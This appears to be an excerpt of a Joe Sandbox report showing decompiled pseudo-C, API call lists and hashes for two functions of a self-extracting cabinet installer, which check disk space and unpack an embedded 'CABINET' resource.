                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E008D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x8d9a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x8d9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x8d9124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E008D268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0x8d9a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E008D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x008d597d
                                                                                                                                                                                                                                            0x008d5988
                                                                                                                                                                                                                                            0x008d598f
                                                                                                                                                                                                                                            0x008d599a
                                                                                                                                                                                                                                            0x008d59a6
                                                                                                                                                                                                                                            0x008d59a8
                                                                                                                                                                                                                                            0x008d59af
                                                                                                                                                                                                                                            0x008d59b9
                                                                                                                                                                                                                                            0x008d59dd
                                                                                                                                                                                                                                            0x008d59e4
                                                                                                                                                                                                                                            0x008d59f1
                                                                                                                                                                                                                                            0x008d59fe
                                                                                                                                                                                                                                            0x008d5a0b
                                                                                                                                                                                                                                            0x008d5a13
                                                                                                                                                                                                                                            0x008d5a19
                                                                                                                                                                                                                                            0x008d5a1b
                                                                                                                                                                                                                                            0x008d5ba1
                                                                                                                                                                                                                                            0x008d5baf
                                                                                                                                                                                                                                            0x008d5bbd
                                                                                                                                                                                                                                            0x008d5bd8
                                                                                                                                                                                                                                            0x008d5bde
                                                                                                                                                                                                                                            0x008d5be3
                                                                                                                                                                                                                                            0x008d5bec
                                                                                                                                                                                                                                            0x008d5bf0
                                                                                                                                                                                                                                            0x008d5bfc
                                                                                                                                                                                                                                            0x008d5c02
                                                                                                                                                                                                                                            0x008d5c02
                                                                                                                                                                                                                                            0x008d5c02
                                                                                                                                                                                                                                            0x008d5c04
                                                                                                                                                                                                                                            0x008d5c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5c04
                                                                                                                                                                                                                                            0x008d5a27
                                                                                                                                                                                                                                            0x008d5a3a
                                                                                                                                                                                                                                            0x008d5a46
                                                                                                                                                                                                                                            0x008d5a48
                                                                                                                                                                                                                                            0x008d5a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5a64
                                                                                                                                                                                                                                            0x008d5a6a
                                                                                                                                                                                                                                            0x008d5a6c
                                                                                                                                                                                                                                            0x008d5abc
                                                                                                                                                                                                                                            0x008d5ac2
                                                                                                                                                                                                                                            0x008d5ac9
                                                                                                                                                                                                                                            0x008d5aca
                                                                                                                                                                                                                                            0x008d5aca
                                                                                                                                                                                                                                            0x008d5acc
                                                                                                                                                                                                                                            0x008d5acc
                                                                                                                                                                                                                                            0x008d5acf
                                                                                                                                                                                                                                            0x008d5ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5ad3
                                                                                                                                                                                                                                            0x008d5ad6
                                                                                                                                                                                                                                            0x008d5ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5ada
                                                                                                                                                                                                                                            0x008d5adc
                                                                                                                                                                                                                                            0x008d5add
                                                                                                                                                                                                                                            0x008d5add
                                                                                                                                                                                                                                            0x008d5ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5ae0
                                                                                                                                                                                                                                            0x008d5ae2
                                                                                                                                                                                                                                            0x008d5ae4
                                                                                                                                                                                                                                            0x008d5ae6
                                                                                                                                                                                                                                            0x008d5ae6
                                                                                                                                                                                                                                            0x008d5ae6
                                                                                                                                                                                                                                            0x008d5ae9
                                                                                                                                                                                                                                            0x008d5aeb
                                                                                                                                                                                                                                            0x008d5af0
                                                                                                                                                                                                                                            0x008d5af6
                                                                                                                                                                                                                                            0x008d5af8
                                                                                                                                                                                                                                            0x008d5af9
                                                                                                                                                                                                                                            0x008d5af9
                                                                                                                                                                                                                                            0x008d5afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5afd
                                                                                                                                                                                                                                            0x008d5aff
                                                                                                                                                                                                                                            0x008d5b00
                                                                                                                                                                                                                                            0x008d5b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5b03
                                                                                                                                                                                                                                            0x008d5b05
                                                                                                                                                                                                                                            0x008d5b08
                                                                                                                                                                                                                                            0x008d5b20
                                                                                                                                                                                                                                            0x008d5b27
                                                                                                                                                                                                                                            0x008d5b52
                                                                                                                                                                                                                                            0x008d5b52
                                                                                                                                                                                                                                            0x008d5b5b
                                                                                                                                                                                                                                            0x008d5b62
                                                                                                                                                                                                                                            0x008d5b6b
                                                                                                                                                                                                                                            0x008d5b6d
                                                                                                                                                                                                                                            0x008d5b76
                                                                                                                                                                                                                                            0x008d5b7d
                                                                                                                                                                                                                                            0x008d5b83
                                                                                                                                                                                                                                            0x008d5b7f
                                                                                                                                                                                                                                            0x008d5b7f
                                                                                                                                                                                                                                            0x008d5b7f
                                                                                                                                                                                                                                            0x008d5b6f
                                                                                                                                                                                                                                            0x008d5b72
                                                                                                                                                                                                                                            0x008d5b72
                                                                                                                                                                                                                                            0x008d5b85
                                                                                                                                                                                                                                            0x008d5b98
                                                                                                                                                                                                                                            0x008d5b9e
                                                                                                                                                                                                                                            0x008d5b87
                                                                                                                                                                                                                                            0x008d5b8f
                                                                                                                                                                                                                                            0x008d5b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5b85
                                                                                                                                                                                                                                            0x008d5b29
                                                                                                                                                                                                                                            0x008d5b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5b35
                                                                                                                                                                                                                                            0x008d5b48
                                                                                                                                                                                                                                            0x008d5b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5b4a
                                                                                                                                                                                                                                            0x008d5b0f
                                                                                                                                                                                                                                            0x008d5b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5b16
                                                                                                                                                                                                                                            0x008d5a7c
                                                                                                                                                                                                                                            0x008d5a8a
                                                                                                                                                                                                                                            0x008d5aa5
                                                                                                                                                                                                                                            0x008d5aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d59bb
                                                                                                                                                                                                                                            0x008d59c0
                                                                                                                                                                                                                                            0x008d59c7
                                                                                                                                                                                                                                            0x008d59d1
                                                                                                                                                                                                                                            0x008d59d6
                                                                                                                                                                                                                                            0x008d5c05
                                                                                                                                                                                                                                            0x008d5c14
                                                                                                                                                                                                                                            0x008d5c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008D59A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 008D59AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 008D5A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 008D5A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 008D5A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D5A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008D5A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008D5AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 008D5BFC
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: 3bd6f11539b7884d6599ded09a19685e6bac7946f4b50f0dc08ef541c983a2c6
                                                                                                                                                                                                                                            • Instruction ID: 5944486e1c69bb054bbe0db96c143ff829c193ad51d4b24572aac030da28639f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bd6f11539b7884d6599ded09a19685e6bac7946f4b50f0dc08ef541c983a2c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C871A1B190161CAFEB15DB64CC85FFA77ACFB48354F1442ABF446D6240EB309E848B21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 8d4fe0-8d501a call 8d468f FindResourceA LoadResource LockResource 377 8d5161-8d5163 374->377 378 8d5020-8d5027 374->378 379 8d5029-8d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 8d5057-8d505e call 8d4efd 378->380 379->380 383 8d507c-8d50b4 380->383 384 8d5060-8d5077 call 8d44b9 380->384 389 8d50e8-8d5104 call 8d44b9 383->389 390 8d50b6-8d50da 383->390 388 8d5107-8d510e 384->388 392 8d511d-8d511f 388->392 393 8d5110-8d5117 FreeResource 388->393 399 8d5106 389->399 398 8d50dc 390->398 390->399 395 8d513a-8d5141 392->395 396 8d5121-8d5127 392->396 393->392 401 8d515f 395->401 402 8d5143-8d514a 395->402 396->395 400 8d5129-8d5135 call 8d44b9 396->400 405 8d50e3-8d50e6 398->405 399->388 400->395 401->377 402->401 404 8d514c-8d5159 SendMessageA 402->404 404->401 405->389 405->399
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E008D4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x8d9144 = E008D468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x8d9140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0x8d8584, 0x841), 5);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E008D4EFD(0, 0);
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E008D4CA0, E008D4CC0, E008D4980, E008D4A50, E008D4AD0, E008D4B60, E008D4BC0, 1, 0x8d9148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0x8d9148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            						E008D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0x8d1140, 0, E008D4CD0, 0, 0x8d9140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					E008D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0x8d9140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0x8d9140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0x8d91d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E008D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0x8d8a38 & 0x00000001) == 0 && ( *0x8d9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0x8d8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x008d4fe0
                                                                                                                                                                                                                                            0x008d4fe6
                                                                                                                                                                                                                                            0x008d4ff9
                                                                                                                                                                                                                                            0x008d500d
                                                                                                                                                                                                                                            0x008d5013
                                                                                                                                                                                                                                            0x008d501a
                                                                                                                                                                                                                                            0x008d5163
                                                                                                                                                                                                                                            0x008d5163
                                                                                                                                                                                                                                            0x008d5020
                                                                                                                                                                                                                                            0x008d5027
                                                                                                                                                                                                                                            0x008d5037
                                                                                                                                                                                                                                            0x008d5051
                                                                                                                                                                                                                                            0x008d5051
                                                                                                                                                                                                                                            0x008d5057
                                                                                                                                                                                                                                            0x008d505e
                                                                                                                                                                                                                                            0x008d50a7
                                                                                                                                                                                                                                            0x008d50ad
                                                                                                                                                                                                                                            0x008d50b4
                                                                                                                                                                                                                                            0x008d50e8
                                                                                                                                                                                                                                            0x008d50e8
                                                                                                                                                                                                                                            0x008d50ee
                                                                                                                                                                                                                                            0x008d50ff
                                                                                                                                                                                                                                            0x008d5104
                                                                                                                                                                                                                                            0x008d5106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5106
                                                                                                                                                                                                                                            0x008d50cd
                                                                                                                                                                                                                                            0x008d50d3
                                                                                                                                                                                                                                            0x008d50da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d50dd
                                                                                                                                                                                                                                            0x008d50e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5060
                                                                                                                                                                                                                                            0x008d5060
                                                                                                                                                                                                                                            0x008d5070
                                                                                                                                                                                                                                            0x008d5075
                                                                                                                                                                                                                                            0x008d5107
                                                                                                                                                                                                                                            0x008d5107
                                                                                                                                                                                                                                            0x008d510e
                                                                                                                                                                                                                                            0x008d5111
                                                                                                                                                                                                                                            0x008d5117
                                                                                                                                                                                                                                            0x008d5117
                                                                                                                                                                                                                                            0x008d511f
                                                                                                                                                                                                                                            0x008d5121
                                                                                                                                                                                                                                            0x008d5127
                                                                                                                                                                                                                                            0x008d5135
                                                                                                                                                                                                                                            0x008d5135
                                                                                                                                                                                                                                            0x008d5127
                                                                                                                                                                                                                                            0x008d5141
                                                                                                                                                                                                                                            0x008d5159
                                                                                                                                                                                                                                            0x008d5159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 008D4FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 008D5006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 008D500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 008D5030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 008D5037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 008D504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 008D5051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 008D5111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 008D5159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 3baf0877e3716733b3c047f3f765178eaea80065527b7beab761d86722756f5e
                                                                                                                                                                                                                                            • Instruction ID: 67cf2633ca505f47dcccd4d286d3b653803215e0f6ea6a6caaeaea9a51ad9ef1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3baf0877e3716733b3c047f3f765178eaea80065527b7beab761d86722756f5e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E31E570642712BBEB205B65EC8AF27376CFB08B55F140327F952E23A1DAB98C408665
